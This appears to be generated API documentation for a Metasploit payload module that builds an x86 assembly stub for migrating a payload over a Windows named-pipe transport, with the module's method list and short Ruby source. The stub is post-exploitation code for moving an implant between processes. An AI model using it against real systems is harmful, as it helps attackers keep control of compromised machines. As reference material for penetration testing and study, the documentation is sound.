Module: Msf::Payload::Windows::MigrateNamedPipe

Includes:

MigrateCommon

Defined in:

lib/msf/core/payload/windows/migrate_named_pipe.rb

Overview

Payload that supports migrating over Named Pipe transports on x86.

Instance Method Summary

• #generate_migrate(opts = {}) ⇒ Object

  Constructs the payload.

• #initialize(info = {}) ⇒ Object

Methods included from MigrateCommon

#generate

Methods included from BlockApi

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#generate_migrate(opts = {}) ⇒ Object

Constructs the payload

# File 'lib/msf/core/payload/windows/migrate_named_pipe.rb', line 29

def generate_migrate(opts = {})
  %Q^
  start_migrate_pipe:
    mov edi, [esi+16]         ; The duplicated pipe handle is in the migrate context.
  signal_pipe_event:
    push dword [esi]          ; Event handle is pointed at by esi
    push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
    call ebp                  ; SetEvent(handle)
  call_pipe_payload:
    call dword [esi+8]        ; call the associated payload
  ^
end

#initialize(info = {}) ⇒ Object

# File 'lib/msf/core/payload/windows/migrate_named_pipe.rb', line 15

def initialize(info={})
  super(update_info(info,
    'Name'        => 'Migrate over Named Pipe transport',
    'Description' => 'Migration stub to use over Named Pipe transports',
    'Author'      => ['OJ Reeves'],
    'License'     => MSF_LICENSE,
    'Platform'    => 'win',
    'Arch'        => ARCH_X86,
  ))
end